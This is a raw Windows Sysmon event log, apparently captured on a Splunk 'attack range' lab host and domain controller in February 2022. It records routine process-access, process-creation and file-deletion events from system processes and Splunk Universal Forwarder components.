11:20:46.607{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222059Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:46.607{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-188E-6216-2D05-000000003902}3956C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000222058Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:46.607{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-188E-6216-2D05-000000003902}3956C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000222057Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:46.608{4F8D34B0-188E-6216-2D05-000000003902}3956C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000222056Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:46.498{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9EAD1CDA00597096A254D194AF93DE2D,SHA256=4E275B637C0E54AD38D9E0B502231E0824F1973287083ABC9A1C8E74F209179A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298195Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:46.701{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0AEA9998051D87F8E06544F3BDDBB4A,SHA256=055BB982CA00E24BE3679E19048072DCC47B4DB570743C9FABABB1C05806EB94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222086Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:47.826{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98EA7C00D86B92B0031376D85A5C77EF,SHA256=5BFE5AB9F65FBB9FBB0A9F21E5F1FDF98EAA0DCD99853D7BCD3B90C4E237ADB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222085Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:47.826{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0BD6EA34B8289DA5159D19F6BD1AA96F,SHA256=2F05F3829F116F2A3DDC8CAA8024AFD0FE4B3E6BFB89C1A6FE5D8C2E2CA6377A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298196Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:47.739{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F50E43180C815BA9BAB0AC0A15497E1D,SHA256=272361D4140DDB6A6009500F7EF1DBFA62AFAA017EB81850B0E27FCF339007C1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222084Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:47.279{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-188F-6216-2E05-000000003902}1264C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222083Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:47.279{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222082Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:47.279{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222081Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:47.279{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222080Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:47.279{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222079Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:47.279{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222078Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:47.279{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222077Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:47.279{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222076Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:47.279{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222075Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:47.279{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222074Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:47.279{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-188F-6216-2E05-000000003902}1264C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000222073Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:47.279{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-188F-6216-2E05-000000003902}1264C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000222072Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:47.280{4F8D34B0-188F-6216-2E05-000000003902}1264C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000222101Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:48.951{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1890-6216-2F05-000000003902}3616C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222100Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:48.951{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222099Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:48.951{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222098Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:48.951{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222097Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:48.951{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222096Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:48.951{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222095Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:48.951{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 